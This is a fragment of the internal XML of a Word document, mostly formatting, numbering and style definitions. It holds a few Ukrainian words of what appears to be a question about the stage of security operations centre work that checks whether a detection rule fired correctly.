          <w:ilvl w:val="0"/>
          <w:numId w:val="1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етап </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC</w:t>
      </w:r>
      <w:r w:rsidRPr="006C188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у передбачає перевірку істинності спрацювання правила?</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006C188E" w:rsidRPr="006C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81AE" w14:textId="77777777" w:rsidR="00102392" w:rsidRDefault="00102392" w:rsidP="006C188E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="38F6A2F6" w14:textId="77777777" w:rsidR="00102392" w:rsidRDefault="00102392" w:rsidP="006C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BFFF" w14:textId="77777777" w:rsidR="00102392" w:rsidRDefault="00102392" w:rsidP="006C188E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6AA92995" w14:textId="77777777" w:rsidR="00102392" w:rsidRDefault="00102392" w:rsidP="006C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4698"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A032130A"/>
    <w:lvl w:ilvl="0" w:tplc="0A62CB4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C5BEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4252B9EA"/>
    <w:lvl w:ilvl="0" w:tplc="E97008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B03D43"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91502794"/>
    <w:lvl w:ilvl="0" w:tplc="D820B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8C53D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66066C2C"/>
    <w:lvl w:ilvl="0" w:tplc="ABD2337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83B5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7ACC4BAC"/>
    <w:lvl w:ilvl="0" w:tplc="620858C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FF0E6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89920E22"/>
    <w:lvl w:ilvl="0" w:tplc="9F7612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675463"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9E65080"/>
    <w:lvl w:ilvl="0" w:tplc="3892C7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AD56B2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43D4979E"/>
    <w:lvl w:ilvl="0" w:tplc="D350503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CB07B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="454E39D8"/>
    <w:lvl w:ilvl="0" w:tplc="35F2E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5474DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97484FC2"/>
    <w:lvl w:ilvl="0" w:tplc="18DC02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EE4ADF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3EE22CA"/>
    <w:lvl w:ilvl="0" w:tplc="9A5C337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6C2113"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0CE22A0"/>
    <w:lvl w:ilvl="0" w:tplc="92787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8926CC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC76D488"/>
    <w:lvl w:ilvl="0" w:tplc="E5F8F26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521BE5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E9218D8"/>
    <w:lvl w:ilvl="0" w:tplc="4D6EF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BA71449"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA7EA97A"/>
    <w:lvl w:ilvl="0" w:tplc="A620B944">
      <w:start w:val="6"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="space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3B1081"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D0C237F4"/>
    <w:lvl w:ilvl="0" w:tplc="840E899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70"/>
    <w:rsid w:val="0009049F"/>
    <w:rsid w:val="00102392"/>
    <w:rsid w:val="001A6718"/>
    <w:rsid w:val="001C472E"/>
    <w:rsid w:val="002D057D"/>
    <w:rsid w:val="002D2D03"/>
    <w:rsid w:val="00352FF0"/>
    <w:rsid w:val="003B650C"/>
    <w:rsid w:val="00595ABD"/>
    <w:rsid w:val="006C188E"/>
    <w:rsid w:val="007533F7"/>
    <w:rsid w:val="007D1D84"/>
    <w:rsid w:val="0081415B"/>
    <w:rsid w:val="00A43F78"/>
    <w:rsid w:val="00A76B70"/>
    <w:rsid w:val="00C878AD"/>
    <w:rsid w:val="00CB73CA"/>
    <w:rsid w:val="00E1799F"/>
    <w:rsid w:val="00F96E64"/>
    <w:rsid w:val="00FB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F6D3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4621B27A-502F-45D8-ABA2-F134685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9F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0009049F"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:kern w:val="2"/>
      <w:sz w:val="28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6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88E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006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20CB-17B4-46AA-9ACB-64D613C5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Laichuk</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Artem Laichuk</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <cp:lastPrinted>2026-03-06T16:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-02T17:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-06T16:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>